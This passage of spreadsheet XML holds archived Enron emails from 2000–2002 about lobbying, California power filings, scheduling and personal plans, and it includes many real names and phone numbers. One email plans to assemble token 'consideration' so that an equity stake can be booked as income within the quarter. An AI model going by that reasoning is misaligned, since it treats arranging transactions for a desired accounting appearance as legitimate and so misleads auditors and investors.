You know you have the stuff to increase Enron's competitive advantage.  Put _x000D_
it in the Edge today.</t>
  </si>
  <si>
    <t>Mon, 24 Apr 2000 09:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'knotestine@littler.com'})</t>
  </si>
  <si>
    <t>Re: Golf Outing</t>
  </si>
  <si>
    <t>Thanks for the invitation, but I cannot make it on Friday.  Have a great _x000D_
time.  Mark</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 15:51:38 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'andy.zipper@enron.com', 'michael.patrick@enron.com', 'jay.fitzgerald@enron.com', 'drew.ries@enron.com'})</t>
  </si>
  <si>
    <t>Kiodex stock purchase agreement</t>
  </si>
  <si>
    <t xml:space="preserve">To summarize where we are on the accounting issues related to booking all of the income related to our 12.5% equity investment in Kiodex in Q1:_x000D_
_x000D_
The 12.5% equity investment has to be a completely separate transaction from the co-marketing arrangement for which we are paid in warrants._x000D_
_x000D_
Kiodex cannot clawback or redeem any portion of the 12.5% if Enron walks the co-marketing agreement at any point in the five-year term.  It is ours to keep._x000D_
_x000D_
The 12.5% equity investment will be collapsed with the co-marketing deal (and therefore income can only be realized over the five-year term) if there isn't enough consideration for the 12.5% to make it look like a real deal.  Mike Patrick believes that we can get the desired accounting treatment for the 12.5% if we deliver promotional materials to our customers and EnronOnline "statistics" as consideration for the 12.5%.  We have not really spelled out exactly what this consideration is, but I have attached a draft stock purchase agreement in which we have attempted to do so in Section 5.11._x000D_
_x000D_
Kiodex wants to close this deal by March 7; we probably can't get the consideration in line by then, but we probably could by the end of the quarter.  Kiodex wasn't crazy about giving us the 12.5% for anything less than the 5-year marketing agreement, and wanted a clawback on the shares even then; they sure won't give us 12.5% for a promise to deliver the consideration by the end of March.  This means we will have to close the deal into escrow, and can get the shares when we deliver the consideration._x000D_
_x000D_
Here are the questions for the deal team:_x000D_
_x000D_
1.	  What can we give to Kiodex before the end of Q1 that supports our 12.5% equity investment.  I can describe the promotional materials, but what "statistics" can we provide that will be valuable to Kiodex?  (Remember that Kiodex will have to feel like they are getting SOMETHING for the 12.5% equity they are giving us, because again, it will be ours to keep regardless of what happens to the co-marketing agreement)._x000D_
_x000D_
2.	 Whatever we decide to give to Kiodex for the 12.5%, we will have to be able to deliver it IN FULL by the end of Q1; otherwise, we can't get our shares, and we can't book the income._x000D_
_x000D_
Here is the stock purchase agreement; I wam working on the language in Section 5.11, but it gives you an idea of what we think we might be able to do._x000D_
_x000D_
    _x000D_
 _x000D_
_x000D_
_x000D_
Travis McCullough_x000D_
Enron North America Corp._x000D_
1400 Smith Street EB 3817_x000D_
Houston Texas 77002_x000D_
Phone:  (713) 853-1575_x000D_
Fax: (713) 646-3490      </t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 09:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Several Items</t>
  </si>
  <si>
    <t>1.  I just met with Phil Cassidy of the Business Council about our _x000D_
invitations.  We discussed several backup options in anticipation that the _x000D_
new Administration might be difficult to enlist as speakers.  So far we have _x000D_
invited Powell, Rumsfeld, O'Neill, Ashcroft, Whitman, and Abraham, having _x000D_
previously been turned down by the congressional leaders.  Phil and I decided _x000D_
we should in light of the tight time left before the meeting, extend _x000D_
invitations to Greenspan and Larry Lindsey.  I also have a long list of third _x000D_
tier invites, many of whom come from the media.  Lora Sullivan and I will be _x000D_
making numerous follow up calls this week to the cabinet invitees.  Early _x000D_
next week I anticipate that we will need to start reaching out to _x000D_
nongovernment types, such as the media.  I will let you know.  We may also _x000D_
decide early next week to extend invites to a few interesting congressional _x000D_
committee leaders, such as Bill Thomas.  _x000D_
_x000D_
2.  I had several meetings on the Hill Friday with Jeff Skilling.  He was _x000D_
very good, although he may have been a little taken back with my unabashed _x000D_
coaching at the start of the day.  If you get any feedback on his impression _x000D_
of the Hill meetings or the inauguration, I'd love to know how we can do _x000D_
things differently and better.  We met with Dick Armey, Don Nickles, Rob _x000D_
Portman, and Charlie Stenholm.  Of particular note, contrary to what he has _x000D_
always told Ken, namely that he would not get active on behalf of a company _x000D_
in Tom Delay's area, Dick Armey was very interested in what Jeff had to say _x000D_
and promised to spend personal time getting up to speed on electric _x000D_
restructuring and would assign a staff person to work the issue.  Jeff _x000D_
attended and thoroughly networked all of the Enron inaugural events, _x000D_
including our private dinner Saturday night with Reps. Blunt and Barton.  _x000D_
Jeff was our star Enron attraction, given that Ken was sick and did not _x000D_
attend the dinner.   At the conclusion of our activities yesterday, I _x000D_
suggested to Jeff that he spend a day in DC every quarter or perhaps three _x000D_
times a year.  He seemed to like the idea, but stressed the importance of _x000D_
getting this travel on his calendar well in advance.  Ideally, we might marry _x000D_
this up with his trips to New York.  We could perhaps structure an evening _x000D_
dinner in DC coupled with a one-half day schedule with the _x000D_
Executive/congressional branches.  Jeff could then spend the rest of the day _x000D_
in NY.   Regardless of the time allotted, we can structure worthwhile time _x000D_
for Jeff in DC.  This will both raise and strengthen his profile.  Also I _x000D_
will be forwarding shortly notes from Jeff to the Members with whom he met.  _x000D_
_x000D_
3.  I met with Rep. Culberson last Thursday.  As I Emailed earlier, he wants _x000D_
to start a campaign for Ken as NASA chair.  I owe Culberson a response on _x000D_
this.  I thought I would run into to Ken at one of Enron's inaugural events.  _x000D_
I did not.  So I need to bug you for an answer on this.  Do you want me to _x000D_
kill this idea?   Also per Culberson's request, we have scheduled a one-half _x000D_
day tour for the Congressman in our office for Feb. 23.  _x000D_
_x000D_
4.  Our inaugural events were extremely well attended and I think quite _x000D_
successful.  If you hear anything differently from any of our executives, I _x000D_
would be pleased to track down any problems. _x000D_
_x000D_
5.  Should I now follow up with Ken's office on the best way to be involved _x000D_
in Ken's DC efforts?  I am glad to do so, but I do not want to overstep.  _x000D_
Thanks.</t>
  </si>
  <si>
    <t>Mon, 1 Oct 2001 14:21:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'r..conner@enron.com'})</t>
  </si>
  <si>
    <t>Pulp facts</t>
  </si>
  <si>
    <t>Andrew,_x000D_
_x000D_
Can you take a look at the attached presentation and see if numbers make sense to you. _x000D_
_x000D_
thanks,_x000D_
Monika</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 06:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>wanna get sauced after work?</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 08:11:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Whatz up?</t>
  </si>
  <si>
    <t>Perfect....Katy also just called to let me know that John Conalee is playing at the Tin Hall tomorrow night, so that of course is another option._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"corey leahy" &lt;celeahy@hotmail.com&gt;@ENRON [mailto:IMCEANOTES-+22corey+20leahy+22+20+3Cceleahy+40hotmail+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Friday, May 11, 2001 10:09 AM_x000D_
To:	Scott, Susan M._x000D_
Subject:	RE: Whatz up?_x000D_
_x000D_
Sounds perfect....  I'm also being a wimp about driving home tonight because_x000D_
I've been feeling like I am about to get sick for three days. Someone told_x000D_
me the mold count was high, which would explain it._x000D_
_x000D_
Leslie is moving to Houston tomorrow.  She is living at the Extended Stay_x000D_
America near you.  (So is Joe.)  I will tell her to give you a call-- she_x000D_
will be working at the DA's office.  Lots of single guys with social_x000D_
consciences who know that money isn't everything...._x000D_
_x000D_
-Corey_x000D_
_x000D_
&gt;From: Susan.M.Scott@enron.com_x000D_
&gt;To: celeahy@hotmail.com_x000D_
&gt;Subject: RE: Whatz up?_x000D_
&gt;Date: Fri, 11 May 2001 09:15:52 -0500_x000D_
&gt;_x000D_
&gt;that sounds good...don't push yourself to do too much, you need to take it_x000D_
&gt;as easy as you can until all of your internships start this summer because_x000D_
&gt;you know they're going to be tiring.  plus, you'll be busy introducing me_x000D_
&gt;to all of the cute single guys you'll be working with...talk about_x000D_
&gt;exhausting!  i'll either chat with you tonight or tomorrow and we can_x000D_
&gt;figure out what, if anything, we want to do.  personally, just going a_x000D_
&gt;having a good meal coupled with good conversation sounds great to me -_x000D_
&gt;nothing big._x000D_
&gt;_x000D_
&gt;     -----Original Message-----_x000D_
&gt;    From:   "corey leahy" &lt;celeahy@hotmail.com&gt;@ENRON_x000D_
&gt;_x000D_
&gt;[mailto:IMCEANOTES-+22corey+20leahy+22+20+3Cceleahy+40hotmail+2Ecom+3E+40ENRON@ENRON.com]_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;    Sent:   Friday, May 11, 2001 9:09 AM_x000D_
&gt;    To:     Scott, Susan M._x000D_
&gt;    Subject:  Re: Whatz up?_x000D_
&gt;_x000D_
&gt;    Probably tomorrow morning.  My brother couldn't come in, but I foresee_x000D_
&gt;a_x000D_
&gt;    long day here, so I don't know if I would be able to get out until too_x000D_
&gt;    late_x000D_
&gt;    to drive home._x000D_
&gt;_x000D_
&gt;    If anything changes, I will let you know.  Otherwise, I'll see you_x000D_
&gt;    tomorrow._x000D_
&gt;_x000D_
&gt;    -Corey_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;    &gt;From: "Scott, Susan M." &lt;Susan.M.Scott@ENRON.com&gt;_x000D_
&gt;    &gt;To: "Corey Leahy (E-mail)" &lt;celeahy@hotmail.com&gt;_x000D_
&gt;    &gt;Subject: Whatz up?_x000D_
&gt;    &gt;Date: Fri, 11 May 2001 08:36:47 -0500_x000D_
&gt;    &gt;_x000D_
&gt;    &gt;Hey there,_x000D_
&gt;    &gt;_x000D_
&gt;    &gt;Just wanted to check and see what your plan is for this weekend._x000D_
&gt;Shoot_x000D_
&gt;    &gt;me an email if you get the chance and let me know when you're going to_x000D_
&gt;    &gt;be driving into Houston._x000D_
&gt;    &gt;_x000D_
&gt;    &gt;Talk to you soon,_x000D_
&gt;    &gt;Sue_x000D_
&gt;_x000D_
&gt;    __________________________________________________________________x000D_
&gt;    Get your FREE download of MSN Explorer at http://explorer.msn.com_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com</t>
  </si>
  <si>
    <t>Wed, 26 Jul 2000 03:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron / HPL Actuals for July 25, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">Teco Tap       30.000 / Enron ; 90.000 / HPL IFERC_x000D_
_x000D_
LS HPL LSK IC       30.000 / Enron_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 Jan 2001 03:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'suzanne_nimocks@mckinsey.com'})</t>
  </si>
  <si>
    <t>Document for Steve Kean</t>
  </si>
  <si>
    <t>Attached are the pages that we wanted to review with you today.  They cover_x000D_
design parameters on the investment vehicle, a number of critical open_x000D_
issues, and next steps on implementing the partnership model.  Please feel_x000D_
free to call me anytime.  I'm in the office today.  713 751-4390.  I can be_x000D_
reached on my cell phone this weekend.  713 628-7342._x000D_
_x000D_
I don't know what your agenda is for the offsite, but to the extent that_x000D_
you need something pulled together, please don't hesitate to ask.  I'll be_x000D_
travelling on Monday, but reachable via cell or voicemail._x000D_
----- Forwarded by Suzanne Nimocks/HOU/NorthAmerica/MCKINSEY on 01/12/2001_x000D_
11:03 AM -----_x000D_
       Memorandum_x000D_
_x000D_
    TO:   Suzanne Nimocks_x000D_
_x000D_
_x000D_
   FROM:   Carol Benter_x000D_
      DATE:    January 12, 2001_x000D_
_x000D_
       Document for Steve Kean_x000D_
_x000D_
       (See attached file: 10112cab.ppt)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
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 10112cab.ppt</t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 01:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alan.comnes@enron.com', 'nbresnan@enron.com', 'dbenevid@enron.com', 'lanai.wolfe@enron.com', 'tim.belden@enron.com', 'kcurry@bracepatt.com', 'robert.badeer@enron.com', 'sarah.novosel@enron.com', 'mary.hain@enron.com', 'gfergus@brobeck.com', 'ginger.dernehl@enron.com', 'james.d.steffes@enron.com', 'paul.kaufman@enron.com', 'richard.shapiro@enron.com', 'steven.j.kean@enron.com', 'mona.l.petrochko@enron.com', 'joseph.alamo@enron.com', 'jeff.richter@enron.com', 'debra.davidson@enron.com', 'christopher.f.calger@enron.com', 'marcia.a.linton@enron.com', 'david.parquet@enron.com', 'jeff.dasovich@enron.com', 'bernadette.hawkins@enron.com', 'maureen.mcvicker@enron.com', 'jwhalan@enron.com', 'joe.hartsoe@enron.com', 'susan.j.mara@enron.com'})</t>
  </si>
  <si>
    <t>Re: Enron's Response Today - Key Point to Focus On</t>
  </si>
  <si>
    <t xml:space="preserve">While there are certainly pros and cons both ways, I agree with Jim to lead _x000D_
with the market structure issues.  This was the focus of FERC's order and we _x000D_
perhaps overemphasize the refund issue by elevating it to number 1.  Plus, we _x000D_
lose a little credibility since, like the UDCs, we would come across as, at _x000D_
bottom, primiarily concerned only with maximizing our financial position, and _x000D_
less concerned with trying to be a constructive force in shaping a _x000D_
competitive market in California.  That is not FERC's priority.  Finally, and _x000D_
I say this will great equivocation, I believe that FERC carefully drafted the _x000D_
refund language, that it knew exactly what it was doing, and is unlikely to _x000D_
move off that formulation either way.  The issue is still of utmost _x000D_
importance but for the foregoing reasons as well as those stated by Jim, I _x000D_
would prioritize it just below the $150 soft cap and prospective refund _x000D_
issue.  Ron_x000D_
_x000D_
&gt;&gt;&gt; &lt;James.D.Steffes@enron.com&gt; 11/22/00 10:30AM &gt;&gt;&gt;_x000D_
_x000D_
As I've been thinking about our response today, I would like Enron to focus_x000D_
on making sure that the California (WSCC) markets are as good a possible_x000D_
for business over the next 15 to 24 months.  Following that idea, I think_x000D_
that the key points are (1) clarifying/raising the soft cap and (2)_x000D_
reducing the burden/risk of the prospective refund period._x000D_
_x000D_
I know that we had discussed leading off with the debate over market power_x000D_
/ retroactive refunds, but I think that (a) FERC is not inclined to do much_x000D_
more on this issue, (b) FERC wants to fix the market as much as it can_x000D_
given the current political realities, and (c) if retroactive refunds_x000D_
become an issue, we still have our full compliment of resources to later_x000D_
fight this fight._x000D_
_x000D_
I would recommend that the pleading and Alan's testimony be modified to_x000D_
bring these issues to the top of the ticket.   We should still include all_x000D_
of our other arguments._x000D_
_x000D_
Finally, I want to make sure that Enron is taking the right position by_x000D_
quietly supporting a $250/Mwh soft cap with safe harbor fixes?  Sue Mara,_x000D_
can you please try and find out what EPSA, IEPCA, and WPTF are going to_x000D_
file?  I want to make sure that we are in the ball park on this issue but_x000D_
not getting too soft._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 9 May 2000 03:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'agrovil@huglushotguns.com'})</t>
  </si>
  <si>
    <t>Huglushotguns</t>
  </si>
  <si>
    <t>I am interested in purchasing a Huglu shotgun and would like to get a price.  _x000D_
I am looking at the Model Au1 semi-automatic model.  Please email me with a _x000D_
price and approximate time til delivery (I live in Houston).  Also, please _x000D_
include information on any choices or extras available._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Martin Cuilla</t>
  </si>
  <si>
    <t>Mon, 4 Feb 2002 14:52:11 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michael.frazier@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'timothy.coffing@enron.com', 'pete.davis@enron.com', 'john.oh@enron.com', 'settlements.ees@enron.com', 'serena.bishop@enron.com', 'chris.mallory@enron.com', 'phillip.platter@enron.com', 'jeffrey.jackson@enron.com', 'jeff.richter@enron.com', 'h..foster@enron.com'})</t>
  </si>
  <si>
    <t>EES CA SCHEDULE for 2/6/02</t>
  </si>
  <si>
    <t>The attached schedule is for Wednesday, Feb 6.  Associated text files will be posted to Sparky today._x000D_
_x000D_
       _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Michael R. Frazier_x000D_
Manager_x000D_
Load Forecasting Desk_x000D_
Enron Energy Services_x000D_
Office: 713-345-3200_x000D_
Pager: 877-926-0615_x000D_
P-mail: 8779260615@skytel.com</t>
  </si>
  <si>
    <t>Wed, 9 Feb 2000 03:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>confusion</t>
  </si>
  <si>
    <t>Spoke to Nick O'Day.  He and Paul Quilkey already have advanced ideas about _x000D_
his replacement (something half commercial/half regulatory), and possibly _x000D_
filled in the interim with a "semi-parttime" consultant.  Tom Briggs came _x000D_
into my office and is willing to relocate for a year.  I would prefer to have _x000D_
Tom there, let Paul hire whatever he needs commercially (FYI- Tom's wife is _x000D_
commercial, and probably could do a "bang up" job for Paul).  I am no _x000D_
shrinking violet (as you probably know), but have been loathe to impose _x000D_
myself/my views, at this early date, but I am not thrilled to hear that Nick _x000D_
has cooked up a solution with Paul that he and I never discussed, after you _x000D_
and I have talked about Tom, and gotten Tom's interest aroused (it seems _x000D_
unfair to Tom to tantalise him with job prospects if we are going to take _x000D_
them back; same issue I suppose you have with Terry).   I think a hybrid _x000D_
commercial/regulatory role is fine (and Tom could do it).  By the way, the _x000D_
org. charts do not show it, but Nick has a subordinate, Reg. Aff. Mgr., _x000D_
Robert McGrory, already in place.  Nick also suggested Mike Grimes going to _x000D_
Tokyo on expat assignment (discussed some time ago with Mike, but apparently _x000D_
not recently).  Your thoughts?  If you can call me after 1000 your time, _x000D_
would like to discuss.  I think you have successfully killed Terry's mass _x000D_
meeting in London.  he and I are meeting for a few hours tomorrow morning.  _x000D_
thanks  mcs</t>
  </si>
  <si>
    <t>Tue, 11 Sep 2001 15:47:10 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'holly.strong@enron.com'})</t>
  </si>
  <si>
    <t>RE: Replacement card</t>
  </si>
  <si>
    <t xml:space="preserve">Holly,_x000D_
I think you have the wrong Bill Williams. I am in Portland and am not involved with card access._x000D_
Thanks,_x000D_
Bill_x000D_
_x000D_
-----Original Message-----_x000D_
From: Strong, Holly _x000D_
Sent: Tuesday, September 11, 2001 8:57 AM_x000D_
To: Allen, Louis; Williams III, Bill; Williams, Sean_x000D_
Subject: Replacement card_x000D_
_x000D_
_x000D_
Ronnie Bagley's access card has died.  Can you replace card number 29776 with card number 37586.  I have issued card and he still needs access to the EB._x000D_
Thanks._x000D_
_x000D_
_x000D_
The most ability is responsibility.  Nothing happens until someone steps forward and says, "You can count on me." _x000D_
_x000D_
Holly Strong _x000D_
Security System Coordinator _x000D_
Enron Broadband Services _x000D_
Houston, Texas _x000D_
Office 713-293-8068 _x000D_
Cell 713-553-4720 _x000D_
Fax 713-293-8212 _x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 31 Jan 2000 01:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Viso document</t>
  </si>
  <si>
    <t xml:space="preserve">Can you see if you cann open this for me_x000D_
thanks_x000D_
_x000D_
---------------------- Forwarded by Elizabeth Sager/HOU/ECT on 01/31/2000 _x000D_
09:45 AM ---------------------------_x000D_
_x000D_
_x000D_
"William F Henze" &lt;William_F_Henze@jonesday.com&gt; on 01/27/2000 06:23:07 PM_x000D_
To: "Andy Katz" &lt;AKatz@eei.org&gt;, "Patricia Dondanville" _x000D_
&lt;pdondanv@schiffhardin.com&gt;, drusso@reliantenergy.com, Elizabeth _x000D_
Sager/HOU/ECT@ECT, dperlman@powersrc.com_x000D_
cc:  _x000D_
Subject: Viso document_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
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Here is another effort.  You will need Visio to download. Tell me what you_x000D_
think.  Regards._x000D_
_x000D_
---------------------- Forwarded by William F Henze/JonesDay on 01/27/2000_x000D_
07:14 PM ---------------------------_x000D_
_x000D_
_x000D_
Cynthia E. Simpson_x000D_
01/27/2000 07:05 PM_x000D_
Extension:     x7-3992_x000D_
_x000D_
To:   William F Henze/JonesDay@JonesDay_x000D_
cc:_x000D_
Subject:  Viso document_x000D_
_x000D_
(See attached file: INTOPRO2.VSD)_x000D_
_x000D_
_x000D_
 - INTOPRO2.VSD_x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 Jan 2002 15:00:18 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'zachary.mccarroll@enron.com'})</t>
  </si>
  <si>
    <t>RE: Thursday morning</t>
  </si>
  <si>
    <t>Sounds good.  See you tomorrow._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Love, Phillip M.  _x000D_
Sent:	Wednesday, January 09, 2002 4:30 PM_x000D_
To:	McCarroll, Zachary_x000D_
Subject:	RE: Thursday morning_x000D_
_x000D_
come down whenever, we can find something to show you._x000D_
PL_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	McCarroll, Zachary  _x000D_
Sent:	Wednesday, January 09, 2002 3:59 PM_x000D_
To:	Love, Phillip M._x000D_
Subject:	Thursday morning_x000D_
_x000D_
Phillip,_x000D_
Last week we discussed me spending time with you one morning to see exactly what it is that I will be doing.  I imagine it will be more of an observing lesson than anything else, but I would like to stop by Thursday morning.  If you are available, what time should I come down there?_x000D_
_x000D_
Zac</t>
  </si>
  <si>
    <t>Thu, 17 Jan 2002 07:26:42 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'araceli.romero@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'m..love@enron.com', 'john.valdes@enron.com', 'a..mausser@enron.com', 'a..bowen@enron.com', 'dan.thibaut@enron.com', 'c..gossett@enron.com', 'ashley.fay@enron.com', 'james.hungerford@enron.com', 'alex.gonzales@enron.com', 'russ.severson@enron.com', 'scott.tackett@enron.com', 'patrick.ryder@enron.com', 'monte.jones@enron.com', 'darren.espey@enron.com', 'kulvinder.fowler@enron.com', 'jennifer.lee@enron.com', 'amy.cavazos@enron.com', 'biliana.pehlivanova@enron.com', 'stephanie.hopkins@enron.com', 'jad.doan@enron.com', 'chance.rabon@enron.com', 'bruce.mills@enron.com', 'luchas.johnson@enron.com', 'michael.castillo@enron.com', 'derek.bailey@enron.com', 'matthew.olney@enron.com', 'd..winfree@enron.com', 'greg.couch@enron.com', 'stephen.perich@enron.com', 'brad.jones@enron.com', 'sladana-anna.kulic@enron.com', 'cathy.sprowls@enron.com', 'thomas.underwood@enron.com', 'errol.mclaughlin@enron.com', 'michelle.nelson@enron.com', 'kam.keiser@enron.com', 'shielah.castro@enron.com', 'laura.vargas@enron.com', 'scott.palmer@enron.com', "ryan.o'rourke@enron.com", 'ashley.worthing@enron.com', 'randy.bhatia@enron.com', 'kori.loibl@enron.com', 'kristen.clause@enron.com', 'melissa.videtto@enron.com', 'joey.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Gas Risk Management staff Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">A Gas Risk Management Staff meeting is scheduled this morning Thursday, January 17th, at 10:00 AM in conference room ECS 5075.  _x000D_
_x000D_
Thank you,_x000D_
_x000D_
AC </t>
  </si>
  <si>
    <t>Mon, 18 Dec 2000 05:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: LM 6000 Documentation</t>
  </si>
  <si>
    <t xml:space="preserve">This may sound like a silly question, but why?  Is this something Ben wants _x000D_
Matt doing? _x000D_
_x000D_
1-4 are all the CO's I know about._x000D_
_x000D_
I'm out today, but we can discuss it tomorrow, and I can explain my point of _x000D_
view._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Rebecca Walker                           12/18/2000 10:18 AM_x000D_
	_x000D_
_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: LM 6000 Documentation_x000D_
_x000D_
Kay_x000D_
_x000D_
Have you had a chance to collect the following information for Matt Tezyk:_x000D_
_x000D_
The free storage letter from GE_x000D_
Any correspondence between GE and you relating to all 24 turbines_x000D_
Any change orders in addition to #1-4_x000D_
Documentation on any other deals we have made with GE_x000D_
_x000D_
Please let me know if I can help with this.  If possible, I'd like to get _x000D_
this information to Matt some time early this week._x000D_
_x000D_
Regards,_x000D_
Rebecca_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Aug 2001 14:30:33 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'8772374503@pagenetmessage.net'})</t>
  </si>
  <si>
    <t>DCF</t>
  </si>
  <si>
    <t>Steve,_x000D_
_x000D_
James ran numbers.  $.22 for 10 yr. for 43,300/d is a DCF of 16.57% with no resubscriptions.  This looks better than any of the 5 year cases on either a 120/d case or 150/d case.  Thoughts?  We have not approached Duke with a 10 yr term yet.  Thanks, Kim and Michelle</t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 14:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kelly.kimberly@enron.com', 'michael.terraso@enron.com', 'lauren.goldblatt@enron.com'})</t>
  </si>
  <si>
    <t>Fwd:Ford chairman calls climate change world's #1 issue</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Steven J Kean/NA/Enron on 10/16/2000 09:25 PM -----_x000D_
_x000D_
	Cynthia Sandherr_x000D_
	10/16/2000 12:48 PM_x000D_
		 _x000D_
		 To: Joe Hillings/Corp/Enron@ENRON, Tom Briggs/NA/Enron@Enron_x000D_
		 cc: Steven J Kean/NA/Enron@Enron, Richard Shapiro/NA/Enron@Enron, Jeffrey _x000D_
Keeler/Corp/Enron@ENRON, Rob Bradley/Corp/Enron@ENRON, Allison _x000D_
Navin/Corp/Enron@ENRON_x000D_
		 Subject: Fwd:Ford chairman calls climate change world's #1 issue_x000D_
_x000D_
_x000D_
Joe and Tom:  Either Bill Ford is a major Democrat or this signals a major _x000D_
shift which serves as a strong indicator that Congress will face new _x000D_
pressures next Congress to address Global Warming.  This is truly a _x000D_
remarkable speech._x000D_
_x000D_
FORD PREDICTS END OF CAR POLLUTION_x000D_
The Independent (UK)_x000D_
6 October 2000_x000D_
_x000D_
Internet:_x000D_
http://www.independent.co.uk/news/UK/Environment/2000-10/ford061000.shtml_x000D_
_x000D_
The 100-year reign of the polluting internal combustion engine is coming to_x000D_
an end, Bill Ford, chairman of the Ford Motor Company, said yesterday. It_x000D_
will soon be replaced in motor vehicles by the hydrogen fuel cell, which_x000D_
emits no pollution whatsoever and so can reduce the build-up of greenhouse_x000D_
gases causing climate change, Mr. Ford, great-grandson of the company's_x000D_
founder, Henry Ford, told the Greenpeace Business Conference in London._x000D_
_x000D_
In a remarkable speech from a motor manufacturer, in which he proclaimed his_x000D_
own environmental credentials, Mr. Ford, 43, accepted that the automobile had_x000D_
had a serious negative impact on the environment, and that his industry had_x000D_
wrongly played down the threat from global warming.  And the head of the_x000D_
world's second biggest car company raised eyebrows even further when he said_x000D_
that he could foresee the day when people would not want to own cars, but_x000D_
merely have access to mobility._x000D_
_x000D_
Detroit-born Mr. Ford, who has been chairman since the start of last year,_x000D_
proclaimed that climate change was the most challenging issue facing the_x000D_
world and that anyone who disagreed was "in denial". Ford itself had moved on_x000D_
from that position, he said. But he felt the Kyoto protocol, the 1997 pact in_x000D_
which the industrialised nations agreed to try to limit their emission of_x000D_
greenhouse gases, would not provide deep enough cuts to halt global warming._x000D_
Only the marketplace, making new technology widely available, could tackle_x000D_
the problem._x000D_
_x000D_
A fuel cell creates energy by an electrochemical process similar to that in a_x000D_
battery: it lets hydrogen and oxygen react together to produce electricity_x000D_
and water vapour. It does not run down or need recharging, working as long as_x000D_
the hydrogen fuel is available, but most importantly, it does not produce any_x000D_
CO2, the basic by-product of any carbon-based fuel such as oil, gas or coal._x000D_
Every major car company in the world is throwing huge sums into developing_x000D_
the technology: Ford is spending $1bn (?690m) between now and 2004, while_x000D_
Daimler-Chrysler, regarded as the leader in the field, has spent $700m. All_x000D_
the main manufacturers have prototype fuel-cell cars running and there is a_x000D_
race to bring them to market. Honda and Toyota expect to do so in 2003, while_x000D_
Ford and Daimler-Chrysler are aiming at 2004._x000D_
_x000D_
"I believe fuel cells will finally end the 100-year reign of the internal_x000D_
combustion engine," Mr. Ford said, adding that the technology was "the holy_x000D_
grail" of the motor industry. Prophesying the demise of car ownership, he_x000D_
said:  "The day will come when the whole notion of car ownership is_x000D_
antiquated," he said. Mr. Ford was reflecting advanced motor industry_x000D_
thinking, which suggests many people might not want to pay for a car of their_x000D_
own if they could be guaranteed mobility on demand from a local hire network._x000D_
</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 15:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jake_scarbrough@hotmail.com'})</t>
  </si>
  <si>
    <t>Re: Moving soon</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hi,_x000D_
It's September 15.  Two weeks after labor day.  You should be getting a save the date card soon, if you haven't already._x000D_
Hope things are good._x000D_
-Jake_x000D_
&gt;From: Monique.Sanchez@enron.com  _x000D_
&gt;To: jake_scarbrough@hotmail.com  _x000D_
&gt;Subject: Re: Moving soon  _x000D_
&gt;Date: Mon, 7 May 2001 14:40:11 -0500  _x000D_
&gt;  _x000D_
&gt;  _x000D_
&gt;Hey there,  _x000D_
&gt;Remind me when your wedding date is? John is planning a backpacking trip  _x000D_
&gt;and is thinking about labor day weekend. I seem to remember your date  _x000D_
&gt;being close to that. Let me know. Hope all is well.  _x000D_
&gt;Mo.  _x000D_
&gt;  _x000D_
_x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com </t>
  </si>
  <si>
    <t>Tue, 15 Aug 2000 10:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>BFM</t>
  </si>
  <si>
    <t>Bob,_x000D_
_x000D_
Two things:_x000D_
_x000D_
1.  Send these sentence to the Cal Px:_x000D_
_x000D_
